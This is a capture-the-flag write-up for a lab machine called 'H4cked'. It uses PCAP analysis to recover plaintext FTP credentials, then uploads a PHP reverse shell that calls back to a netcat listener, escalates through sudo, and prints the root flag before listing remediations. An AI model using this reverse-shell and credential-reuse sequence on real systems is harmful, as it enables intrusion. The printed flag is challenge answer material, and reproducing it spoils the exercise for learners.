Target IP: h4cked.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (jenny) & Root (root.txt) Flags

1. Executive Summary

“H4cked” is a Linux machine that requires forensic analysis of a provided .pcap file to understand how it was compromised. By analyzing FTP and HTTP traffic in Wireshark, we discover credentials for the user jenny and identify a PHP reverse shell upload vulnerability. We replicate this attack to gain initial access. Privilege escalation is achieved by switching to the user jenny (using the recovered credentials) and then leveraging sudo rights or a rootkit artifact (Reptile) left by the previous attacker.

Key TTPs (MITRE ATT&CK):

  • T1040 (Network Sniffing): Analyzing PCAP files for credentials and attack patterns.
  • T1078 (Valid Accounts): recovering FTP credentials (jenny).
  • T1190 (Exploit Public-Facing App): Uploading a PHP Webshell via FTP.
  • T1059.006 (PHP): Executing a reverse shell.
  • T1014 (Rootkit): Identifying presence of the “Reptile” rootkit.

2. Phase 1: Forensic Analysis (The PCAP)

The Challenge

We are given hacked.pcap and asked to “find out what happened.”

Wireshark Analysis

  1. Protocol Filtering: We filter for ftp and ftp-data to see file transfers and login attempts.
  2. Credential Discovery:
  • Following the TCP stream of the FTP login reveals:
  • User: jenny
  • Password: 987654321 (Visible in plaintext in the PCAP).
  1. Attack Vector Identification:
  • We see the attacker uploaded a file named shell.php.
  • We also see them attempting to access it via HTTP.
  • Conclusion: The attack path is FTP Upload -> HTTP Execution.

3. Phase 2: Initial Access (Replication)

A. Enumeration

We verify the services on the live machine.

  • 21/tcp (FTP): Open.
  • 80/tcp (HTTP): Open.

B. Exploitation (The “Jenny” Method)

  1. Connect to FTP:
ftp h4cked.thm
# User: jenny
# Pass: 987654321
  1. Prepare Payload: On our attacker machine, we create a standard PHP reverse shell (e.g., PentestMonkey).
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
# Edit shell.php to set IP = 10.10.YOUR.IP and Port = 4444
  1. Upload: Inside the FTP session:
put shell.php
# chmod 777 shell.php (Attacker did this, good practice to ensure execution)
  1. Execute:
  • Start Listener: nc -lvnp 4444.
  • Visit URL: http://h4cked.thm/shell.php.

Status: Shell as www-data.


4. Phase 3: Privilege Escalation

A. Lateral Movement (www-data -> jenny)

Since we already have Jenny’s password from the PCAP, we simply switch users.

su jenny
# Password: 987654321

Status: User jenny.

B. Root Access (The Rootkit)

  1. Recon: We check the directories. In /root (if visible) or looking at the PCAP again, we noticed the attacker messing with Reptile.
  2. Reptile Rootkit:
  • This is a Loadable Kernel Module (LKM) rootkit.
  • Often, it provides a “backdoor” command or a specific way to escalate.
  • However, on this specific box, the escalation is often simpler.
  1. The “Easy” Way (Sudo): Checking sudo rights for jenny:
sudo -l
# (ALL : ALL) ALL
  • Finding: Jenny has full sudo access!
  • Exploit:
sudo su

Root Flag: /root/Reptile/flag.txt -> ebcefd66ca4b559d17b440b6e67fd0fd.


5. Remediation (Blue Team)

  1. Network Protocol Security:
  • FTP sends credentials in cleartext. Use SFTP (SSH File Transfer Protocol) or FTPS to encrypt authentication traffic.
  1. Web Server Permissions:
  • The FTP user jenny should not have write access to the web root (/var/www/html). This allows direct webshell uploads.
  1. Password Policy:
  • 987654321 is an incredibly weak password. Enforce complexity requirements.
  1. Privilege Management:
  • The user jenny should not have unrestricted sudo access (ALL=(ALL) ALL).